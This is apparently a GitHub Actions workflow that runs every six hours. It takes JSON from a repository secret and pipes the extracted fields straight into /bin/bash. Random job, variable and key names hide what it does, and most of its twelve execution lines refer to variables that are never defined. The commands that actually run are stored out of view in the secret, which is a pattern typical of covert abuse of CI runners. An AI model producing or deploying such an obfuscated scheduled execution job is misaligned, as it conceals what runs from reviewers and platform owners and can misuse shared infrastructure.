name: dayinmag
on:
  workflow_dispatch:
  schedule:
    - cron: '19 4/6 * * *'

jobs:  # 30749
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dayinmag
        env:
          c6: ${{ secrets.c6 }}
        run: |
          echo $c6 | jq -r .ce555 | /bin/bash
          echo $elaas33825 | jq -r .y9 | /bin/bash
          echo $ndglk102 | jq -r .pifzy33236 | /bin/bash
          echo $cdstn725 | jq -r .bjch4 | /bin/bash
          echo $ysf3 | jq -r .xl43262 | /bin/bash
          echo $nqb2227 | jq -r .kgzt7 | /bin/bash
          echo $lmiwh893 | jq -r .txevu075 | /bin/bash
          echo $y261 | jq -r .n07 | /bin/bash
          echo $tck17099 | jq -r .iuj22326 | /bin/bash
          echo $xvx948 | jq -r .zda46 | /bin/bash
          echo $cp8 | jq -r .l0248 | /bin/bash
          echo $cqh2 | jq -r .szveo41418 | /bin/bash

